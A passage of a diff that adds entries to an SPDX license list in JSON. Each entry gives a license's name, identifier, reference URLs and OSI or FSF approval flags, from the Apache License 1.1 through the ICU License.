+ "name": "Apache License 1.1",
+ "licenseId": "Apache-1.1",
+ "seeAlso": [
+ "http://apache.org/licenses/LICENSE-1.1",
+ "https://opensource.org/licenses/Apache-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
+ "referenceNumber": 191,
+ "name": "Creative Commons Attribution No Derivatives 4.0 International",
+ "licenseId": "CC-BY-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
+ "referenceNumber": 192,
+ "name": "FreeBSD Documentation License",
+ "licenseId": "FreeBSD-DOC",
+ "seeAlso": [
+ "https://www.freebsd.org/copyright/freebsd-doc-license/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SCEA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SCEA.json",
+ "referenceNumber": 193,
+ "name": "SCEA Shared Source License",
+ "licenseId": "SCEA",
+ "seeAlso": [
+ "http://research.scea.com/scea_shared_source_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Latex2e.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
+ "referenceNumber": 194,
+ "name": "Latex2e License",
+ "licenseId": "Latex2e",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Latex2e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
+ "referenceNumber": 195,
+ "name": "Artistic License 1.0 w/clause 8",
+ "licenseId": "Artistic-1.0-cl8",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
+ "referenceNumber": 196,
+ "name": "SGI Free Software License B v1.1",
+ "licenseId": "SGI-B-1.1",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NRL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NRL.json",
+ "referenceNumber": 197,
+ "name": "NRL License",
+ "licenseId": "NRL",
+ "seeAlso": [
+ "http://web.mit.edu/network/isakmp/nrllicense.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SWL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SWL.json",
+ "referenceNumber": 198,
+ "name": "Scheme Widget Library (SWL) Software License Agreement",
+ "licenseId": "SWL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SWL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zed.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zed.json",
+ "referenceNumber": 199,
+ "name": "Zed License",
+ "licenseId": "Zed",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Zed"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
+ "referenceNumber": 200,
+ "name": "CERN Open Hardware Licence v1.1",
+ "licenseId": "CERN-OHL-1.1",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
+ "referenceNumber": 201,
+ "name": "Red Hat eCos Public License v1.1",
+ "licenseId": "RHeCos-1.1",
+ "seeAlso": [
+ "http://ecos.sourceware.org/old-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JasPer-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
+ "referenceNumber": 202,
+ "name": "JasPer License",
+ "licenseId": "JasPer-2.0",
+ "seeAlso": [
+ "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
+ "referenceNumber": 203,
+ "name": "Server Side Public License, v 1",
+ "licenseId": "SSPL-1.0",
+ "seeAlso": [
+ "https://www.mongodb.com/licensing/server-side-public-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
+ "referenceNumber": 204,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
+ "referenceNumber": 205,
+ "name": "Open LDAP Public License v1.4",
+ "licenseId": "OLDAP-1.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libpng-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
+ "referenceNumber": 206,
+ "name": "PNG Reference Library version 2",
+ "licenseId": "libpng-2.0",
+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
+ "referenceNumber": 207,
+ "name": "CNRI Python Open Source GPL Compatible License Agreement",
+ "licenseId": "CNRI-Python-GPL-Compatible",
+ "seeAlso": [
+ "http://www.python.org/download/releases/1.6.1/download_win/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Aladdin.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
+ "referenceNumber": 208,
+ "name": "Aladdin Free Public License",
+ "licenseId": "Aladdin",
+ "seeAlso": [
+ "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
+ "referenceNumber": 209,
+ "name": "CeCILL Free Software License Agreement v1.0",
+ "licenseId": "CECILL-1.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Ruby.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Ruby.json",
+ "referenceNumber": 210,
+ "name": "Ruby License",
+ "licenseId": "Ruby",
+ "seeAlso": [
+ "http://www.ruby-lang.org/en/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
+ "referenceNumber": 211,
+ "name": "Netscape Public License v1.1",
+ "licenseId": "NPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.1/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ImageMagick.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
+ "referenceNumber": 212,
+ "name": "ImageMagick License",
+ "licenseId": "ImageMagick",
+ "seeAlso": [
+ "http://www.imagemagick.org/script/license.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Cube.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Cube.json",
+ "referenceNumber": 213,
+ "name": "Cube License",
+ "licenseId": "Cube",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Cube"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
+ "referenceNumber": 214,
+ "name": "GNU Free Documentation License v1.1 only",
+ "licenseId": "GFDL-1.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
+ "referenceNumber": 215,
+ "name": "Creative Commons Attribution 2.0 Generic",
+ "licenseId": "CC-BY-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
+ "referenceNumber": 216,
+ "name": "Academic Free License v1.2",
+ "licenseId": "AFL-1.2",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
+ "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
+ "referenceNumber": 217,
+ "name": "Creative Commons Attribution Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
+ "referenceNumber": 218,
+ "name": "CeCILL Free Software License Agreement v2.0",
+ "licenseId": "CECILL-2.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-advertising.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
+ "referenceNumber": 219,
+ "name": "Enlightenment License (e16)",
+ "licenseId": "MIT-advertising",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
+ "referenceNumber": 220,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-NC-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
+ "referenceNumber": 221,
+ "name": "Artistic License 1.0",
+ "licenseId": "Artistic-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
+ "referenceNumber": 222,
+ "name": "Open Software License 3.0",
+ "licenseId": "OSL-3.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
+ "https://opensource.org/licenses/OSL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/X11.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/X11.json",
+ "referenceNumber": 223,
+ "name": "X11 License",
+ "licenseId": "X11",
+ "seeAlso": [
+ "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Bahyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
+ "referenceNumber": 224,
+ "name": "Bahyph License",
+ "licenseId": "Bahyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Bahyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
+ "referenceNumber": 225,
+ "name": "Open LDAP Public License v2.0.1",
+ "licenseId": "OLDAP-2.0.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUDatagrid.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
+ "referenceNumber": 226,
+ "name": "EU DataGrid Software License",
+ "licenseId": "EUDatagrid",
+ "seeAlso": [
+ "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
+ "https://opensource.org/licenses/EUDatagrid"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MTLL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MTLL.json",
+ "referenceNumber": 227,
+ "name": "Matrix Template Library License",
+ "licenseId": "MTLL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
+ "referenceNumber": 228,
+ "name": "GNU Free Documentation License v1.2 only - invariants",
+ "licenseId": "GFDL-1.2-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
+ "referenceNumber": 229,
+ "name": "GNU Free Documentation License v1.3 or later - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/curl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/curl.json",
+ "referenceNumber": 230,
+ "name": "curl License",
+ "licenseId": "curl",
+ "seeAlso": [
+ "https://github.com/bagder/curl/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
+ "referenceNumber": 231,
+ "name": "Licence Art Libre 1.3",
+ "licenseId": "LAL-1.3",
+ "seeAlso": [
+ "https://artlibre.org/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DSDP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DSDP.json",
+ "referenceNumber": 232,
+ "name": "DSDP License",
+ "licenseId": "DSDP",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/DSDP"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
+ "referenceNumber": 233,
+ "name": "CERN Open Hardware Licence v1.2",
+ "licenseId": "CERN-OHL-1.2",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TOSL.json",
+ "referenceNumber": 234,
+ "name": "Trusster Open Source License",
+ "licenseId": "TOSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TOSL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
+ "referenceNumber": 235,
+ "name": "GNU General Public License v3.0 w/Autoconf exception",
+ "licenseId": "GPL-3.0-with-autoconf-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
+ "referenceNumber": 236,
+ "name": "Creative Commons Attribution 3.0 Unported",
+ "licenseId": "CC-BY-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Qhull.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Qhull.json",
+ "referenceNumber": 237,
+ "name": "Qhull License",
+ "licenseId": "Qhull",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Qhull"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
+ "referenceNumber": 238,
+ "name": "GNU Free Documentation License v1.3 only - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
+ "referenceNumber": 239,
+ "name": "TORQUE v2.5+ Software License v1.1",
+ "licenseId": "TORQUE-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
+ "referenceNumber": 240,
+ "name": "Microsoft Public License",
+ "licenseId": "MS-PL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-PL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
+ "referenceNumber": 241,
+ "name": "Apache License 1.0",
+ "licenseId": "Apache-1.0",
+ "seeAlso": [
+ "http://www.apache.org/licenses/LICENSE-1.0"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
+ "referenceNumber": 242,
+ "name": "copyleft-next 0.3.1",
+ "licenseId": "copyleft-next-0.3.1",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
+ "referenceNumber": 243,
+ "name": "GNU Free Documentation License v1.2 or later",
+ "licenseId": "GFDL-1.2-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0+.json",
+ "referenceNumber": 244,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MulanPSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MulanPSL-2.0.json",
+ "referenceNumber": 245,
+ "name": "Mulan Permissive Software License, Version 2",
+ "licenseId": "MulanPSL-2.0",
+ "seeAlso": [
+ "https://license.coscl.org.cn/MulanPSL2/"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFAP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFAP.json",
+ "referenceNumber": 246,
+ "name": "FSF All Permissive License",
+ "licenseId": "FSFAP",
+ "seeAlso": [
+ "https://www.gnu.org/prep/maintain/html_node/License-Notices-for-Other-Files.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xerox.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xerox.json",
+ "referenceNumber": 247,
+ "name": "Xerox License",
+ "licenseId": "Xerox",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xerox"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.0.json",
+ "referenceNumber": 248,
+ "name": "Common Development and Distribution License 1.0",
+ "licenseId": "CDDL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/cddl1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-invariants-only.json",
+ "referenceNumber": 249,
+ "name": "GNU Free Documentation License v1.3 only - invariants",
+ "licenseId": "GFDL-1.3-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/etalab-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/etalab-2.0.json",
+ "referenceNumber": 250,
+ "name": "Etalab Open License 2.0",
+ "licenseId": "etalab-2.0",
+ "seeAlso": [
+ "https://github.com/DISIC/politique-de-contribution-open-source/blob/master/LICENSE.pdf",
+ "https://raw.githubusercontent.com/DISIC/politique-de-contribution-open-source/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/XFree86-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/XFree86-1.1.json",
+ "referenceNumber": 251,
+ "name": "XFree86 License 1.1",
+ "licenseId": "XFree86-1.1",
+ "seeAlso": [
+ "http://www.xfree86.org/current/LICENSE4.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SNIA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SNIA.json",
+ "referenceNumber": 252,
+ "name": "SNIA Public License 1.1",
+ "licenseId": "SNIA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SNIA_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.1.json",
+ "referenceNumber": 253,
+ "name": "LaTeX Project Public License v1.1",
+ "licenseId": "LPPL-1.1",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CATOSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CATOSL-1.1.json",
+ "referenceNumber": 254,
+ "name": "Computer Associates Trusted Open Source License 1.1",
+ "licenseId": "CATOSL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/CATOSL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-2.0.json",
+ "referenceNumber": 255,
+ "name": "Technische Universitaet Berlin License 2.0",
+ "licenseId": "TU-Berlin-2.0",
+ "seeAlso": [
+ "https://github.com/CorsixTH/deps/blob/fd339a9f526d1d9c9f01ccf39e438a015da50035/licences/libgsm.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3.json",
+ "referenceNumber": 256,
+ "name": "GNU Free Documentation License v1.3",
+ "licenseId": "GFDL-1.3",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-or-later.json",
+ "referenceNumber": 257,
+ "name": "GNU Free Documentation License v1.3 or later",
+ "licenseId": "GFDL-1.3-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.2.json",
+ "referenceNumber": 258,
+ "name": "Licence Art Libre 1.2",
+ "licenseId": "LAL-1.2",
+ "seeAlso": [
+ "http://artlibre.org/licence/lal/licence-art-libre-12/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ICU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ICU.json",
+ "referenceNumber": 259,
+ "name": "ICU License",
+ "licenseId": "ICU",
+ "seeAlso": [
+ "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
